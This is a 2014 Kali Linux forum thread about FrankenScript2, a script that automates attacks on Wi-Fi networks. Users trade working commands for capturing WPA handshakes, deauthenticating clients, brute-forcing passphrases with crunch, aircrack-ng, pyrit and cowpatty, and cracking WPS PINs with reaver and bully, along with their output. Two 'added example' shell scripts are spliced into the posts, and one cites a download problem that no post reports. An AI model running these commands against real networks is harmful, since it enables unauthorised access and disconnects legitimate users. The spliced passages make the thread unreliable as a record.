Nevermind. Having the network manager open and using FS2 does work. So surfing and testing at the same time is possible. Slowly un-confusing myself after a bad start here.

slim76
2014-06-12, 22:30
Nevermind. Having the network manager open and using FS2 does work. So surfing and testing at the same time is possible. Slowly un-confusing myself after a bad start here.

Sorry there's no instructions. LOL
Glad its working for you and many thanks for taking the time to leave feedback. :-)

Quest
2014-06-15, 18:09
Slim, what are the option(s) to attack a wpa protected network that does not have wps(pin number) with FS2?

Does this technique without dictionary look familiar to you?

1. scan

airodump-ng mon0

2. listening

airodump-ng -c CH# --bssid 'BSSID' showstatistics -w 'filename' 'interface'
airodump-ng -c 11 --bssid 58:98:35:CB:A2:77 --showack -w filemario mon0

3. deauthenticate a client

aireplay-ng -0 10 -a 'BSSID' -c 'CLIENT:MAC:ADDRESS' 'interface'
aireplay-ng -0 10 -a 58:98:35:CB:A2:77 -c 70:D4:F2:91:AE:67 mon0

4. crunch

crunch 8 8 0123456789 | aircrack-ng -a 2 'filename.cap' -e '”essid”' -b 'HANDSHAKE' -w -
crunch 8 8 0123456789 | aircrack-ng -a 2 filemario-01.cap -e “mario” -b 58:98:35:CB:A2:77 -w -

I've seen something similar in FS2, but dictionary dependent -OR-(as the tradition will have it) I'm missing something?

slim76
2014-06-15, 23:23
I'm not sure what you are asking.

If you mean you want to capture a wpa/wpa2 handshake:
Choose option [1] from the main menu, then choose a target network that is wpa/wpa2 encrypted.
Then choose option "[1] = WPA/WPA2 Handshake Capture" from the menu.

Or if you are asking how to attack a handshake capture file without a dictionary:
crunch 10 10 abcdef23456789 -d 3 | pyrit -e $AP_essid -i - -o - passthrough | cowpatty -d - -r $HOME/FrankenScript/temp/$Capture_File -s $AP_essid

Or if you are asking if the above command is in FrankenScript2:
I removed most of the options to attack a handshake capture file, but I'll be rewriting them and adding them again at some point.

Hope at least one of those answered your question? LOL

Quest
2014-06-28, 17:25
Thank you, that pretty much answered my questions.

Slim, what are the chances of you and repzeroworld, i) joining your scripts together, and then ii) turning your scripts into an application?

You can check out repzeroworld script here https://forums.kali.org/showthread.php?19641-Reaver-WPS-Locked-Situation-and-Useful-Link/page3

I'm asking because it would be a lot easier to invoke both of your scripts in one application with a simple command, and then it could be incorporated in the next Kali.

slim76
2014-06-29, 00:34
You're welcome mate.

From my point of view the chances are slim to none, at this moment in time it's beyond my knowledge.
FrankenScript is a basic script, it hasn't even been written very well. LOL
FrankenScript isn't copyright protected and people are free to do whatever they like with it.

PLEASE NOTE:
FrankenScript uses other scripts/tools that were created by other people, it would be a useless script without these other scripts/tools (Many thanks to everyone).
If anyone is interested in what scripts/tools are used then please research them for yourself, I only say this because listing them all would take forever and missing someone out might offend them.

Quest
2014-06-29, 16:32
I started a topic (in Kali Linux General Use) asking if anyone knows how to make such a program. Something that would seek out scripts in the root folder and give the user the choice of scripts to be launched. That would solve it right there.

slim76
2014-06-30, 22:24
I started a topic (in Kali Linux General Use) asking if anyone knows how to make such a program. Something that would seek out scripts in the root folder and give the user the choice of scripts to be launched. That would solve it right there.

That shouldn't be too hard to achieve, FrankenScript uses the same method to detect capture files in the capture file folder. ;-)

Quest
2014-06-30, 22:39
so you just officially offered to create such an application! Great! Thank you! You're the best Slim! The community will be for ever grateful!

Here are some ideas for the name of the program..


Lazyboy
ScriptFinder
Shepherd
....


:D

Mehran
2014-07-02, 11:33
Does it work for WPS cracking? I mean cracking the PIN number?

slim76
2014-07-02, 16:36
Does it work for WPS cracking? I mean cracking the PIN number?

It uses reaver so yes it can crack wps.
It also uses several scripts that can generate the wps pin for some but not all routers.

slim76
2014-07-02, 16:39
so you just officially offered to create such an application! Great! Thank you! You're the best Slim! The community will be for ever grateful!

Here are some ideas for the name of the program..


Lazyboy
ScriptFinder
Shepherd
....


:D

I've added this function and I'll upload the updated version when I've finished adding the other wordlist/passthrough cracking options.

Quest
2014-07-02, 17:02
no way!!!! Thanks! I will check it out as soon as I'm done with writing a howto in the Howto section for some other stuff.


:D

Quest
2014-07-03, 01:50
Slim, does this (http://anonsvn.wireshark.org/wireshark/trunk/manuf) look familiar to you? It's a router identification list based upon MAC address bssid. It would be useful to implement, and have FrankenScript tell the operator which make (name of the company) is the target (router), as with some makes of routers I've had to install Reaver 1.3, as 1.4 had big problems with some of them. Sometimes all versions of reaver will fail where Bully will succeed.

That may save the operator many hours/days of futile attempts :mad:

soxrok2212
2014-07-03, 16:38
You can have a look here (https://forums.kali.org/showthread.php?21650-Find-Router-Make-and-Model-Over-Wi-Fi) to find the model number, and possibly even the serial number here also!

Mehran
2014-07-04, 08:29
I got this error: Press [Enter] to stop the airodump scan and continue.xterm: cannot open /root/FrankenScript2/Temp_Working_Dirctory/Wash_Network_Scan.txt: 2:No such file or directory
Wash_Network_Scan.txt does not exist in my folder. I also created it, but I get the same error, and I can't choose an AP.

Also, my Reaver is stuck on Sending identity response

[+] Waiting for beacon from 64:68:0C:59:2C:9A
[+] Switching mon0 to channel 3
[+] Associated with 64:68:0C:59:2C:9A (ESSID: WLAN_23)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response

Can you help me with why reaver is stuck on this step?

slim76
2014-07-04, 14:57
I got this error: Press [Enter] to stop the airodump scan and continue.xterm: cannot open /root/FrankenScript2/Temp_Working_Dirctory/Wash_Network_Scan.txt: 2:No such file or directory
Wash_Network_Scan.txt does not exist in my folder. I also created it, but I get the same error, and I can't choose an AP.

Also, my Reaver is stuck on Sending identity response

[+] Waiting for beacon from 64:68:0C:59:2C:9A
[+] Switching mon0 to channel 3
[+] Associated with 64:68:0C:59:2C:9A (ESSID: WLAN_23)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response

Can you help me with why reaver is stuck on this step?

Copy the FrankenScript2 folder and contents to your home folder then try it again.

slim76
2014-07-06, 18:29
I'm trying to get Bully working but it keeps trying the same pin over and over again, has anyone else had the same problem and can anyone advise me how to fix the issue?

Quest
2014-07-06, 18:42
what's the syntax Bro?

It works out of the box for me(no special steps). I just enter simple syntax

bully monX -c XX -b XX:XX:XX:XX:XX:XX -v3

or


bully monX -c XX -b XX:XX:XX:XX:XX:XX -v3 -p XXXX
when specifying a certain first four pin number.

slim76
2014-07-06, 23:14
what's the syntax Bro?

It works out of the box for me(no special steps). I just enter simple syntax

bully monX -c XX -b XX:XX:XX:XX:XX:XX -v3

or


bully monX -c XX -b XX:XX:XX:XX:XX:XX -v3 -p XXXX
when specifying a certain first four pin number.

Already tried those but cheers anyway matey :-)

staticn0de
2014-07-13, 10:35
Hi there slim,

I've been trying out your script, I'm a big fan!

So far, I was able to capture my handshake and I noticed it auto converts to .hccap. I've seen here in the thread that there was an option to attack a handshake file from within the script. Has this been removed or am I using an old version? I went through the script and couldn't find any feature that relates.

Cheers

slim76
2014-07-13, 11:54
Hi there slim,

I've been trying out your script, I'm a big fan!

So far, I was able to capture my handshake and I noticed it auto converts to .hccap. I've seen here in the thread that there was an option to attack a handshake file from within the script. Has this been removed or am I using an old version? I went through the script and couldn't find any feature that relates.

Cheers
I think I removed the options from the version you're using, but I'll upload an updated version later today or tomorrow if all goes well.

FrankenScript2 Information.
=================

[1] Scan And Attack AP's:
-------------------------
Auto check/auto enable monitor mode function.
MAC address spoofing options.
Kill processes options (airmon-ng check kill).
Network scanners - wash & airodump-ng combined.
Sort displayed scan results by Signal Strength, Attack Method, or Originally Displayed.
Default access point WEP/WPA passkey generators.
WEP Attacks - Aircrack Tools.
WPA/WPA2 Attacks - Aircrack Tools.
WPS Attacks - Reaver & Bully & Default WPS-Pin generators.
Recovered passkeys are saved in $HOME/FrankenScript2/Recovered-Passkeys.txt.

[2] Return To Scanned AP's:
---------------------------
Returns you to the last network scan.

[3] Attack Handshake.cap Files:
-------------------------------
[1] = Wordlist + Pyrit + Cowpatty (Non-Resumable).
Simple capture file presentation & selection.
Drag & drop a wordlist onto the screen, or manually input the path and file name.
Attack method - Two attacks are run at the same time (Same processing power but the chances of getting the passkey sooner are greater):
Attack 1 - Works through a wordlist from the beginning to the end.
Attack 2 - Works through a wordlist from the end to the beginning.
Recovered passkeys are saved in $HOME/FrankenScript2/Recovered-Passkeys.txt.

[2] = Passthrough Attack (Resumable).
Start a new attack option.
Easy capture file selection.
Configurable passkey's creation options.
Attack - Crunch Pyrit cowpatty.
Resume an attack.
Recovered passkeys are saved in $HOME/FrankenScript2/Recovered-Passkeys.txt.

[4] Script Launcher:
--------------------
Launch other scripts.
Scripts must be placed in the $HOME/FrankenScript2/Scripts folder.
Script file names can't contain any blank spaces or special characters.

[5] WiFi Adapter Override:
--------------------------
WiFi adapter selection, only available if multiple wifi adapters are present.

[6] System Mode Override:
-------------------------
Switch between "Networking Mode & Attack Mode".

[7] Recovered Passkey's:
------------------------
Displays all recovered passkeys.
Recovered passkey file: $HOME/FrankenScript2/Recovered-Passkeys.txt

[0] Exit FrankenScript2:
------------------------
Removes temporary files.
Disables attack mode and re-enables networking mode.
Exit the script.

caiiostylle
2014-07-14, 00:11
Hello, I was very interested in using your script.
But I cannot open it in my terminal. Only the message "the file is binary and can not be opened" appears. How do I open it?

I think it is because of the extension "tar.gz". I cannot open it.
Give me an answer.
I'm hanging on.

staticn0de
2014-07-14, 07:30
Sounds great slim, I'm looking forward to trying it out.

Have you considered putting the project on github?

slim76
2014-07-14, 12:12
You need to unpack the tar.gz file

slim76
2014-07-14, 12:18
pmsl, do you really think it's good enough to put on github. lol

slim76
2014-07-14, 12:19
Here's the latest FrankenScript.
FrankenScript2: Updated 14/7/14

FrankenScript2_Updated-14-7-2014.tar.gz
http://mir.cr/0LY66HZC

[1] Scan And Attack AP's:
-------------------------
Auto check/auto enable monitor mode function.
MAC address spoofing options.
Kill processes options (airmon-ng check kill).
Network scanners - wash & airodump-ng combined.
Sort displayed scan results by Signal Strength, Attack Method, or Originally Displayed.
Default access point WEP/WPA passkey generators.
WEP Attacks - Aircrack Tools.
WPA/WPA2 Attacks - Aircrack Tools.
WPS Attacks - Reaver & Bully & Default WPS-Pin generators.
Recovered passkeys are saved in $HOME/FrankenScript2/Recovered-Passkeys.txt.

[2] Return To Scanned AP's:
---------------------------
Returns you to the last network scan.

[3] Attack Handshake.cap Files:
-------------------------------
[1] = Wordlist + Pyrit + Cowpatty (Non-Resumable).
Simple capture file presentation & selection.
Drag & drop a wordlist onto the screen, or manually input the path and file name.
Attack method - Two attacks are run at the same time (Same processing power but the chances of getting the passkey sooner are greater):
Attack 1 - Works through a wordlist from the beginning to the end.
Attack 2 - Works through a wordlist from the end to the beginning.
Recovered passkeys are saved in $HOME/FrankenScript2/Recovered-Passkeys.txt.

[2] = Passthrough Attack (Resumable).
Start a new attack option.
Easy capture file selection.
Configurable passkey's creation options.
Attack - Crunch Pyrit cowpatty.
Resume an attack.
Recovered passkeys are saved in $HOME/FrankenScript2/Recovered-Passkeys.txt.

[4] Script Launcher:
--------------------
Launch other scripts.
Scripts must be placed in the $HOME/FrankenScript2/Scripts folder.
Script file names can't contain any blank spaces or special characters.

[5] WiFi Adapter Override:
--------------------------
WiFi adapter selection, only available if multiple wifi adapters are present.

[6] System Mode Override:
-------------------------
Switch between "Networking Mode & Attack Mode".

[7] Recovered Passkey's:
------------------------
Displays all recovered passkeys.
Recovered passkey file: $HOME/FrankenScript2/Recovered-Passkeys.txt

[0] Exit FrankenScript2:
------------------------
Removes temporary files.
Disables attack mode and re-enables networking mode.
Exit the script.

staticn0de
2014-07-14, 12:31
pmsl, do you really think it's good enough to put on github. lol

Is it sad I had to google pmsl?

That being said, I've seen some rubbish on github
To start, your script actually works ☺ that's a step up from a lot of projects.

It would make It easy to report issues and such if they come up.

slim76
2014-07-14, 19:01
Is it sad I had to google pmsl?

That being said, I've seen some rubbish on github
To start, your script actually works ☺ that's a step up from a lot of projects.

It would make It easy to report issues and such if they come up.

I'm grateful for your support matey and glad you found it useful.

Apologies for the pmsl, in my defence I was texting my girlfriend at the same time.
It was never really intended for public use, but I shared it here to try and give back to the community.

Quest
2014-07-15, 18:07
Good job slim!!

I'm messing with it now, and here are my observations..


[4] Script Launcher:
Thank you!! It works.



ATTACK METHOD - HANDSHAKE CAPTURE
#################################

NOTE: Wait for clients to be visable in airodump before entering option [2].

[1] = Deauthenticate all connected clients.
[2] = Deauthenticate a specific client.
[3] = Return To Scanned APs.
Please choose an option:
oh really? ;)



Scanned_APs
===========

30: ...

1: ...

[r] = Re-Scan
[e] = Sort By - ESSID (AP Name)
[s] = Sort By - Signal Strength
[a] = Sort By - Attack Method
[0] = Return To Main Menu
Please choose an option or input the number of a target:
that's cool! Are those new options?


I'm getting this message. That is most likely from my end. Will reinstall and check-in later.

ATTACK METHOD - HANDSHAKE CAPTURE
#################################

NOTE: Wait for clients to be visable in airodump before entering option [2].

[1] = Deauthenticate all connected clients.
[2] = Deauthenticate a specific client.
[3] = Return To Scanned APs.
Please choose an option: xterm: cannot open /root/FrankenScript2/Temp_Working_Dirctory/Handshake_Check.txt: 17:File exists




EDIT:

removed FS2 from Home, re-downloaded it and re-installed and I get this message just before a wep attack:


Starting Fragment
xterm: cannot open /root/FrankenScript2/Temp_Working_Dirctory/Aireplay_Fragment_Check.txt: 17:File exists
but it proceeds with the attack normally(?)


on wpa also...

ATTACK METHOD - HANDSHAKE CAPTURE
#################################

NOTE: Wait for clients to be visable in airodump before entering option [2].

[1] = Deauthenticate all connected clients.
[2] = Deauthenticate a specific client.
[3] = Return To Scanned APs.
Please choose an option: xterm: cannot open /root/FrankenScript2/Temp_Working_Dirctory/Handshake_Check.txt: 17:File exists





Can anyone else reproduce these messages/problems on their setup please?

staticn0de
2014-07-15, 19:52
Hey quest, did you happen to close the script with control + c and not exit using the option on the menu?

From what I read in the script, it cleans temp files on exit. That would explain your file exists error

Quest
2014-07-15, 20:42
These syntaxes in FS2 when starting Bully , are not getting me anywhere, and they crash Bully back to the attack options...

Option [1] = Bully & WPS Default Pin.

Bully & WPS-Pin Attack Command:
bully mon0 -b 84:C9:B2:XX:XX:XX -c X -e Xxxxx -p 3333 -F -B -l 60 -v 3

Press [Enter] to launch the attack.

And option [2] = Bully Basic Attack.

Bully Basic Attack Command:
bully mon0 -b 84:C9:B2:XX:XX:XX -c X -e Xxxxx -F -l 60 -v 3

Press [Enter] to launch the attack.


I've tried these commands directly in Bully to see what the problem was with these syntaxes and here is the return:


root@kali:~# bully mon0 -b 84:C9:B2:XX:XX:XX -c X -e Xxxxx -p 3333 -F -B -l 60 -v 3
[!] Bully v1.0-22 - WPS vulnerability assessment utility
[+] Switching interface 'mon0' to channel '6'
[!] Starting pin specified, defaulting to sequential mode
[!] Using 'f2:af:63:61:fc:6b' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '84:c9:b2:0a:e1:22' on channel '6'
[X] Unable to get a beacon from the AP, possible causes are
[.] an invalid --bssid or -essid was provided,
[.] the access point isn't on channel '6',
[.] you aren't close enough to the access point.
root@kali:~#



root@kali:~# bully mon0 -b 84:C9:B2:XX:XX:XX -c X -e Xxxxx -F -l 60 -v 3
[!] Bully v1.0-22 - WPS vulnerability assessment utility
[+] Switching interface 'mon0' to channel '6'
[!] Using 'f2:af:63:61:fc:6b' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '84:c9:b2:0a:e1:22' on channel '6'
[X] Unable to get a beacon from the AP, possible causes are
[.] an invalid --bssid or -essid was provided,
[.] the access point isn't on channel '6',
[.] you aren't close enough to the access point.
root@kali:~#



Now to confirm that it is possible to attack that same target with a simple syntax...


root@kali:~# bully mon0 -c X -b 84:C9:B2:XX:XX:XX -v 3
[!] Bully v1.0-22 - WPS vulnerability assessment utility
[+] Switching interface 'mon0' to channel '6'
[!] Using 'f2:af:63:61:fc:6b' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '84:c9:b2:0a:e1:22' on channel '6'
[+] Got beacon for 'Xxxx wi-fi' (84:c9:b2:0a:e1:22)
[+] Loading randomized pins from '/root/.bully/pins'
[!] Restoring session from '/root/.bully/84c9b20ae122.run'
[+] Index of starting pin number is '0023000'
[+] Last State = 'NoAssoc' Next pin '71092997'
[+] Rx( M5 ) = 'Pin1Bad' Next pin '18102994'
[+] Rx( M5 ) = 'Pin1Bad' Next pin '24942997'
[+] Rx( M5 ) = 'Pin1Bad' Next pin '20102999'
[+] Rx( M5 ) = 'Pin1Bad' Next pin '07132995'
[+] Rx( M5 ) = 'Pin1Bad' Next pin '58762998'
[+] Rx( M5 ) = 'Pin1Bad' Next pin '38872990'
[+] Rx( M5 ) = 'Pin1Bad' Next pin '21282997'
[+] Rx( M5 ) = 'Pin1Bad' Next pin '98162994'
^C
Saved session to '/root/.bully/84c9b20ae122.run'
root@kali:~#

Quest
2014-07-15, 20:44
Hey quest, did you happen to close the script with control + c and not exit using the option on the menu?

From what I read in the script, it cleans temp files on exit. That would explain your file exists error

ah yes that is a possibility! Great if it's on my end :) Good catch friend!

caiiostylle
2014-07-16, 01:15
These syntaxes in FS2 when starting Bully , are not getting me anywhere, and they crash Bully back to the attack options...

Option [1] = Bully & WPS Default Pin.


And option [2] = Bully Basic Attack.


I've tried these commands directly in Bully to see what the problem was with these syntaxes and here is the return:







Now to confirm that it is possible to attack that same target with a simple syntax...

I can not understand this script. I open it, choose the first option, it opens wash, and an error message appears, claiming a missing ".txt" file.

What do I do? I need help!

staticn0de
2014-07-16, 01:42
I can not understand this script. I open it, choose the first option, it opens wash, and an error message appears, claiming a missing ".txt" file.

What do I do? I need help!

Hey there, please post the entire error message.

caiiostylle
2014-07-16, 02:08
Hey there, please post the entire error message.

This is my error..
I select the first option to search, and then it opens wash and displays the second screen.

I want to remind you that I am using a wireless card in my notebook for this.

http://uploaddeimagens.com.br/images/000/311/571/original/print1.png?1405476429

http://uploaddeimagens.com.br/images/000/311/574/original/print2.png?1405476536

Help me!

staticn0de
2014-07-16, 02:46
This is my error..
I select the first option to search, and then it opens wash and displays the second screen.

I want to remind you that I am using a wireless card in my notebook for this.

http://uploaddeimagens.com.br/images/000/311/571/original/print1.png?1405476429

http://uploaddeimagens.com.br/images/000/311/574/original/print2.png?1405476536

Help me!

Looks to me that you're running the script from a folder on your desktop. You need to put the folder in your home directory.

slim76
2014-07-16, 03:38
@ Quest,
The file error message is because a file didn't get deleted, I think I've solved the issue now.
I've only used bully a couple of times but those commands worked for me ok, I'll look into it but please can you post all the bully commands that work for you.

@ caiiostylle,
Try what staticn0de suggested, if that doesn't work then please post the error message in english so I can try to help you.

I'll post the updated version soon.

Quest
2014-07-16, 04:13
sure thing bro,

I'm not a Bully expert and I wish there was more feedback on that subject, but the few times I've used it, those below, worked great on any AP anywhere, anytime...

bully monX -c XX -b XX:XX:XX:XX:XX:XX -v 3
bully Interface -Channel -BSSID -verbosity 3

bully monX -c XX -b XX:XX:XX:XX:XX:XX -v 3 -p XXXX
bully Interface -Channel -BSSID -verbosity 3 -PIN

"easy does it" as they say :D

Quest
2014-07-16, 04:29
ATTACK METHOD - HANDSHAKE CAPTURE
#################################

NOTE: Wait for clients to be visable in airodump before entering option [2].

[1] = Deauthenticate all connected clients.
[2] = Deauthenticate a specific client.
[3] = Return To Scanned APs.
Please choose an option: xterm: cannot open /root/FrankenScript2/Temp_Working_Dirctory/Handshake_Check.txt: 17:File exists

if you can get those fixed also ;)

Quest
2014-07-16, 05:14
also, the way you have FS2 wrapped up in folders (root/Desktop/Untitled Folder/FrankenScript2) is not practical methinks. It was better before. I could just decompress it Home.

slim76
2014-07-16, 11:09
also, the way you have FS2 wrapped up in folders (root/Desktop/Untitled Folder/FrankenScript2) is not practical methinks. It was better before. I could just decompress it Home.

I don't understand what you mean when you said "(root/Desktop/Untitled Folder/FrankenScript2)", FrankenScript shouldn't be in that location.
FrankenScript should be unpacked to your Home folder and not the Desktop.

Quest
2014-07-16, 12:12
The way the tar.gz is packaged. It is wrapped in many 'parent' folders before the FrankenScript2 folder.

So when I uncompress it I have a "root" folder, inside that a "Desktop" folder, inside that a "Untitled Folder" folder, then finally I get the "FrankenScript2" folder.


FrankenScript2_Updated-14-7-2014.tar.gz\root\Desktop\Untitled Folder - TAR+GZIP archive, unpacked size 2 401 208 bytes 1,04 Mb (1 091 590)

I used winrar4.0 and ark under Kali. I've DL the archive 3 times now with the same results. I doubt that I'm the only one getting that result.

My FrankenScript2 folder is indeed in my Home directory. I have that part figured out by now :p
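
The two download problems reported in this thread (a mirror serving a `.tar.gz.exe` of a different size, and the archive being wrapped in `root/Desktop/Untitled Folder`) can both be caught before anything is unpacked. The following is an added example, not part of the original posts or of FrankenScript; the function names and the sample files are constructed for illustration.

```shell
#!/bin/sh
# Added example: vet a downloaded .tar.gz before unpacking it.
# All function names and the sample files below are constructed.

# Classify a file by its first two bytes: gzip (1f 8b), pe (MZ, a Windows
# executable) or other. The file name and extension are ignored on purpose.
file_kind() {
    magic=$(od -An -tx1 -N2 "$1" | tr -d ' \n')
    case "$magic" in
        1f8b) echo gzip ;;
        4d5a) echo pe ;;
        *)    echo other ;;
    esac
}

# Size in bytes, to compare with the size reported for the genuine file.
file_size() {
    wc -c < "$1" | tr -d ' '
}

# List members that would land outside the extraction directory:
# absolute paths or any ".." component. Prints nothing when all are safe.
unsafe_members() {
    tar -tzf "$1" | grep -E '^/|(^|/)\.\.(/|$)' || true
}

# Count the wrapper directories in front of the directory named $2
# (3 for root/Desktop/Untitled Folder/FrankenScript2). Fails if $2 is absent,
# which is also the case when the files sit loose in the archive.
wrapper_depth() {
    tar -tzf "$1" | awk -F/ -v want="$2" '
        { for (i = 1; i <= NF; i++) if ($i == want) { print i - 1; found = 1; exit } }
        END { if (!found) exit 1 }'
}

# Verify, then unpack $1 into $2 so that directory $3 ends up directly under
# $2 however many parent folders it was packed with. Optional $4: expected
# size in bytes (a published checksum would be a stronger check than size).
safe_extract() {
    archive=$1 dest=$2 want=$3 expected=${4:-}
    kind=$(file_kind "$archive")
    if [ "$kind" != gzip ]; then
        echo "refusing $archive: content is '$kind', not gzip" >&2; return 1
    fi
    if [ -n "$expected" ] && [ "$(file_size "$archive")" != "$expected" ]; then
        echo "refusing $archive: size differs from expected $expected bytes" >&2; return 1
    fi
    if [ -n "$(unsafe_members "$archive")" ]; then
        echo "refusing $archive: member paths escape the target directory" >&2; return 1
    fi
    depth=$(wrapper_depth "$archive" "$want") || {
        echo "refusing $archive: no '$want' directory inside" >&2; return 1
    }
    mkdir -p "$dest" &&
        tar -xzf "$archive" -C "$dest" --strip-components="$depth"
}

# Build constructed samples in directory $1: an archive with the wrapped
# layout described above, and a fake ".tar.gz.exe" that starts with "MZ".
make_sample_archive() {
    inner="$1/src/root/Desktop/Untitled Folder/FrankenScript2"
    mkdir -p "$inner"
    printf '#!/bin/sh\necho placeholder\n' > "$inner/FrankenScript2.sh"
    chmod 755 "$inner/FrankenScript2.sh"
    tar -czf "$1/sample.tar.gz" -C "$1/src" root
    printf 'MZ constructed placeholder, not a real executable\n' > "$1/sample.tar.gz.exe"
}

# Run "sh thisfile demo" to see the checks on the constructed samples.
if [ "${1:-}" = demo ]; then
    tmp=$(mktemp -d)
    make_sample_archive "$tmp"
    for f in "$tmp/sample.tar.gz" "$tmp/sample.tar.gz.exe"; do
        echo "$f: $(file_kind "$f"), $(file_size "$f") bytes"
    done
    safe_extract "$tmp/sample.tar.gz" "$tmp/home" FrankenScript2 &&
        ls -l "$tmp/home/FrankenScript2"
    rm -rf "$tmp"
fi
```
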

Quest
2014-07-16, 12:54
Also...

it might just be me lucking out, but I'm not getting anywhere with that version of FS2, no matter what I try.

No handshakes. No wep success. Nada. Keeps sending out packets endlessly. It does associate, but that's the extent of it. I had all kinds of success with the previous version.

That might be on my end though(?)

slim76
2014-07-16, 16:15
Also...

it might just be me lucking out, but I'm not getting anywhere with that version of FS2, no matter what I try.

No handshakes. No wep success. Nada. Keeps sending out packets endlessly. It does associate, but that's the extent of it. I had all kinds of success with the previous version.

That might be on my end though(?)

That's really odd cause everything works for me, can anyone else confirm the same issues please?
I'll be uploading another updated version within the next day or two, you can try the new version or I'll help you fix the current version.

staticn0de
2014-07-16, 19:59
I have the same thing with the unpack. A tar xvf lands the directory in an untitled folder on my desktop. It did not matter that I had the archive in my home folder and ran the extract from there.

The script itself works fine for me though. I am able to capture handshakes, use bully and reaver no problems. Haven't tripped a WEP attack yet.

I was also able to brute force with word list.

Have you considered adding support for cudahashcat? If not, I'll give it a crack on the weekend.

No major issues as of yet with the script. I had the same as quest where I didn't close the script correctly. I added a line to clear temp on load and that fixed it.
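
The "File exists" errors discussed above come from temp files that survive when the script is stopped with Ctrl+C instead of through its exit option. The following is an added example, not FrankenScript's own code, of a per-run temp directory that is removed on every exit path and that also clears stale leftovers at start; `start_session`, `WORKDIR` and the `run.XXXXXX` layout are hypothetical names.

```shell
#!/bin/sh
# Added example: temp-file handling that survives Ctrl+C and kill.
# start_session, WORKDIR and the run.XXXXXX layout are hypothetical names.

start_session() {
    base=$1
    mkdir -p "$base" || return 1

    # Clear leftovers from runs that could not clean up (SIGKILL, power loss).
    # A run directory is stale when its recorded owner PID no longer exists.
    for stale in "$base"/run.*; do
        [ -d "$stale" ] || continue
        owner=$(cat "$stale/pid" 2>/dev/null || true)
        if [ -z "$owner" ] || ! kill -0 "$owner" 2>/dev/null; then
            rm -rf "$stale"
        fi
    done

    # A fresh directory per run: a file such as Handshake_Check.txt can
    # never collide with one left behind by an earlier run.
    WORKDIR=$(mktemp -d "$base/run.XXXXXX") || return 1
    echo "$$" > "$WORKDIR/pid"

    # The EXIT trap does the cleanup. Signals are turned into a normal exit
    # so the EXIT trap also fires in shells (dash, for one) that do not run
    # it when the shell is terminated by a signal.
    trap 'rm -rf "$WORKDIR"' EXIT
    trap 'exit 130' INT
    trap 'exit 143' TERM HUP
}

# Run "sh thisfile demo" and press Ctrl+C: the directory is gone afterwards.
if [ "${1:-}" = demo ]; then
    start_session "${TMPDIR:-/tmp}/fs-demo"
    : > "$WORKDIR/Handshake_Check.txt"
    echo "working in $WORKDIR; press Ctrl+C or wait 5 seconds"
    sleep 5
fi
```
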

slim76
2014-07-16, 22:20
I have the same thing with the unpack. A tar xvf lands the directory in an untitled folder on my desktop. It did not matter that I had the archive in my home folder and ran the extract from there.

The script itself works fine for me though. I am able to capture handshakes, use bully and reaver no problems. Haven't tripped a WEP attack yet.

I was also able to brute force with word list.

Have you considered adding support for cudahashcat? If not, I'll give it a crack on the weekend.

No major issues as of yet with the script. I had the same as quest where I didn't close the script correctly. I added a line to clear temp on load and that fixed it.

Most grateful for your feedback and glad to hear it all works for you.
I was thinking about adding cudahashcat but I always seem to get side tracked by something else, I'll probably add it when I've got bully working properly.

caiiostylle
2014-07-17, 00:24
Most grateful for your feedback and glad to hear it all works for you.
I was thinking about adding cudahashcat but I always seem to get side tracked by something else, I'll probably add it when I've got bully working properly.

I realized that when I unpack the file in the home folder, it creates a directory on my desktop that does not appear.

When I go to the root folder, I find FS2 within the root folder. I try to open the file, and I can open it using the 'bash' command. When I select the first option and select my wireless network card, it opens a 'wash' window and the message appears.

xterm: connot open / root/FrankenScript2/Temp_Working_Directory/Wash_Network_Scan.txt: 2

Quest
2014-07-17, 01:20
slim, once you've uploaded the new version, I will write a howto for it, whether you like it or not.

xD

slim76
2014-07-17, 20:40
slim, once you've uploaded the new version, I will write a howto for it, whether you like it or not.

xD

Ok kool, I've decided to make some more changes to FrankenScript2 so the upload will be a little delayed.

slim76
2014-07-18, 20:02
Here's the latest FrankenScript.
FrankenScript2: Updated 18/7/14

http://mir.cr/0QHRHOHT

staticn0de
2014-07-18, 21:56
Hi Slim,

Not a problem, just a comment. Publishing the script in a rar seems to have removed file permissions (the x flag has been cleared with 0644) and the rar file does not extract to its own folder anymore.

Quest
2014-07-18, 22:10
yeah, slim, now the files are loose inside the archive. No FrankenScript2 folder!

London
2014-07-18, 22:42
I just read this whole thread today, then downloaded. Everyone knows already, but I'll say it anyway... Great Work!

Also, same here. I unrar-ed to find multiple scripts and whatnot floating around.

slim76
2014-07-18, 23:20
Thanks for letting me know guys and sorry about that, I've just repacked it again and hopefully all should be good this time around.

FrankenScript2_Updated-19-7-2014.tar.gz
http://mir.cr/1UNMCFAJ

staticn0de
2014-07-19, 00:38
Just so you guys know, if you extract the archive with unrar x FrankenScript.rar it places the files in folders. Still have to chmod the scripts though. Thanks for uploading as the tar.gz we all know and love!

Quest
2014-07-19, 02:51
Thanks slim!!

Here are my observations..

- Decompress normally in "FrankenScript2" folder.

- Starts normally with "cd /root/FrankenScript2 && ./FrankenScript2.sh"

-
[1] = Full iw-dev Scan
[2] = Wash WPS Network Scan.
[3] = Airodump Network Scan.
Please choose an option: I like that!!!



- Option 1 ([1] = Full iw-dev Scan) does not work for me. The return...

Scanned_APs
===========



############################################################################
# [f] = Re-Scan - Full iw-dev Scan      # [e] = Sort Scan By - ESSID       #
# [w] = Re-Scan - Wash WPS Network Scan # [a] = Sort Scan By - Encryption  #
# [d] = Re-Scan - Airodump Network Scan # [0] = Return To Main Menu        #
#                                       # [q] = Exit FrankenScript         #
############################################################################

Please choose an option or input the number of a target:

- Dude...

ATTACK METHOD - HANDSHAKE CAPTURE
#################################

NOTE: Wait for clients to be visable in airodump before entering option [2].

[1] = Deauthenticate all connected clients.
[2] = Deauthenticate a specific client.
[0] = Return To Scanned APs.
[q] = Exit FrankenScript
Please choose an option:
xD



Bully

- big improvements. All option working. But...


[3] = Bully Custom Attack.

Bully Current Attack Command:
bully mon0 -c 6 -b 84:C9:B2:0A:E1:22 3 <---I'm not going to tell ya what is missing here ..wink

Please input any additional Bully options:


- Is it possible that FS2 messes with network manager? I lose my connection on wlan0. Anyone having the same?
Maybe I choose option 1 (killing all processes) but I don't think I did...



That's it for now. :)

